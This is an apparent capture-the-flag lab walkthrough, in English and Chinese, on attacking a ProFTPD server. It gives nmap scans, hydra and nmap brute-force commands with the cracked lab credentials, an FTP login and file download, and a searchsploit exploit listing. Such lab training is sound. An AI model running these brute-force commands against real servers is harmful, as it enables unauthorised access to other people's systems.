Exploiting FTP
FTP (File Transfer Protocol) is a protocol that uses TCP port 21 and is used to facilitate file sharing between a server and client/clients.
It is also frequently used as a means of transferring files to and from the directory of a web server.
FTP authentication requires a username and password combination. As a result, we can perform a brute-force attack on the FTP server in order to identify legitimate credentials.
In some cases, FTP servers may be configured to allow anonymous access, which consequently allows anyone to access to the FTP server without providing any legitimate credentials.
利用 FTP
FTP(文件传输协议)是一种使用 TCP 端口 21 的协议,用于促进服务器和客户端/客户端之间的文件共享。
它还经常用作将文件传输到 Web 服务器目录和从 Web 服务器目录传输文件的一种方式。
FTP 身份验证需要用户名和密码组合。 因此,我们可以对 FTP 服务器执行暴力攻击,以识别合法凭据。
在某些情况下,FTP 服务器可能被配置为允许匿名访问,因此任何人都可以在不提供任何合法凭据的情况下访问 FTP 服务器。
Demo: Exploiting FTP
1
2
3
ifconfig
eth1: inet 192.93.66.2
1
nmap -sV 192.93.66.3
Check if the anonymous access is configured.
Anonymous access is disabled.
1
2
3
4
5
6
ftp 192.93.66.3
Name (192.93.66.3:root): anonymous
Password:
530 Login incorrect.
ftp> exit
Check wether the ftp server support anonymous access use the nmap script:
1
2
ls -al /usr/share/nmap/scripts/ | grep ftp-*
-rw-r--r-- 1 root root 4530 Jan 9 2019 ftp-anon.nse
Perform a brute-force.
1
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.93.66.3 -t 4 ftp
1
2
3
4
5
6
7
8
9
10
ftp 192.93.66.3
Name (192.93.66.3:root): sysadmin
Password: 654321
230 User sysadmin logged in
ftp> dir
ftp> get secret.txt
ftp> exit
ls
cat secret.txt
Try to login with Administrator as well:
1
2
3
4
5
ftp 192.93.66.3
Name (192.93.66.3:root): administrator
Password: qwerty
ftp> dir
ftp> exit
1
2
3
4
nmap -sV 192.93.66.3
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
searchsploit is a command line utility that would allow you to search for exploit on the exploitdb database.
1
searchsploit ProFTPD
ProFTP 侦察:基础知识
概述
在这个挑战中,我们将了解 ProFTP 服务器侦察的基础知识。请开始实验并回答以下问题:
问题
- FTP服务器的版本是多少?
- 使用用户名字典 /usr/share/metasploit-framework/data/wordlists/common_users.txt 和密码字典 /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 检查这些凭据是否在系统上有效. 列出所有找到的凭据。
- 使用 nmap 脚本查找用户“sysadmin”的密码。
- 找到隐藏在服务器上的七个标志。
指示:
- 这个实验室是献给你的!此网络上没有其他用户 :)
- 开始实验室后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XYZ 的接口运行“ip addr”来知道 X 和 Y 的值。
- 目标机器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
我自己的思路
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.3 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:03 txqueuelen 0 (Ethernet)
RX packets 101 bytes 9626 (9.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 94 bytes 312658 (305.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.139.31.2 netmask 255.255.255.0 broadcast 192.139.31.255
ether 02:42:c0:8b:1f:02 txqueuelen 0 (Ethernet)
RX packets 15 bytes 1306 (1.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 18 bytes 1656 (1.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 1656 (1.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1
2
3
4
5
6
7
8
9
10
11
12
root@attackdefense:~# nmap -sV 192.139.31.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-18 09:18 UTC
Nmap scan report for target-1 (192.139.31.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
MAC Address: 02:42:C0:8B:1F:03 (Unknown)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
1
2
3
4
5
6
7
8
9
10
11
12
root@attackdefense:~# ftp 192.139.31.3
Connected to 192.139.31.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.139.31.3]
Name (192.139.31.3:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# ls -al /usr/share/nmap/scripts | grep ftp
-rw-r--r-- 1 root root 4530 Jan 9 2019 ftp-anon.nse
-rw-r--r-- 1 root root 3253 Jan 9 2019 ftp-bounce.nse
-rw-r--r-- 1 root root 3108 Jan 9 2019 ftp-brute.nse
-rw-r--r-- 1 root root 3258 Jan 9 2019 ftp-libopie.nse
-rw-r--r-- 1 root root 3295 Jan 9 2019 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root 3748 Jan 9 2019 ftp-syst.nse
-rw-r--r-- 1 root root 6007 Jan 9 2019 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root 5943 Jan 9 2019 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root 5678 Jan 9 2019 tftp-enum.nse
检查 FTP 服务器是否允许匿名登录。
如果允许匿名,则获取根目录的目录列表并突出显示可写文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.139.31.3 -t 4 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-18 09:25:25
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking ftp://192.139.31.3:21/
[21][ftp] host: 192.139.31.3 login: sysadmin password: 654321
[21][ftp] host: 192.139.31.3 login: rooty password: qwerty
[21][ftp] host: 192.139.31.3 login: demo password: butterfly
[STATUS] 3054.00 tries/min, 3054 tries in 00:01h, 4009 to do in 00:02h, 4 active
[21][ftp] host: 192.139.31.3 login: auditor password: chocolate
[21][ftp] host: 192.139.31.3 login: anon password: purple
[21][ftp] host: 192.139.31.3 login: administrator password: tweety
[STATUS] 3029.50 tries/min, 6059 tries in 00:02h, 1004 to do in 00:01h, 4 active
[21][ftp] host: 192.139.31.3 login: diag password: tigger
1 of 1 target successfully completed, 7 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 4 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-18 09:27:39
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# echo "sysadmin" > users
root@attackdefense:~# nmap --script ftp-brute --script-args userdb=/root/users -p 21 192.205.242.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-18 10:46 UTC
Nmap scan report for target-1 (192.205.242.3)
Host is up (0.000046s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts:
| sysadmin:654321 - Valid credentials
|_ Statistics: Performed 25 guesses in 5 seconds, average tps: 5.0
MAC Address: 02:42:C0:CD:F2:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 6.19 seconds
1
2
3
4
5
6
7
sysadmin:654321
rooty:qwerty
demo:butterfly
auditor:chocolate
anon:purple
administrator:tweety
diag:tigger
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# ftp 192.139.31.3
Connected to 192.139.31.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.139.31.3]
Name (192.139.31.3:root): sysadmin
331 Password required for sysadmin
Password:
230 User sysadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (152.0121 kB/s)
ftp> exit
221 Goodbye.
root@attackdefense:~# ls
README secret.txt tools wordlists
root@attackdefense:~# cat secret.txt
260ca9dd8a4577fc00b7bd5810298076
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@attackdefense:~# searchsploit ProFTPD
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution | exploits/freebsd/remote/18181.txt
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow | exploits/linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass | exploits/multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) | exploits/linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service | exploits/linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) | exploits/linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) | exploits/linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) | exploits/linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root | exploits/linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service | exploits/linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage | exploits/linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration | exploits/linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force | exploits/linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun | exploits/linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection | exploits/linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) | exploits/linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) | exploits/linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service | exploits/linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection | exploits/multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow | exploits/unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) | exploits/linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) | exploits/linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) | exploits/linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow | exploits/linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) | exploits/linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) | exploits/linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) | exploits/linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | exploits/linux/remote/36742.txt
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | exploits/linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) | exploits/linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) | exploits/linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion | exploits/linux/remote/20690.sh
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
解决方案
此实验室的解决方案可在以下手册中找到: https://assets.ine.com/labs/ad-manuals/walkthrough-518.pdf
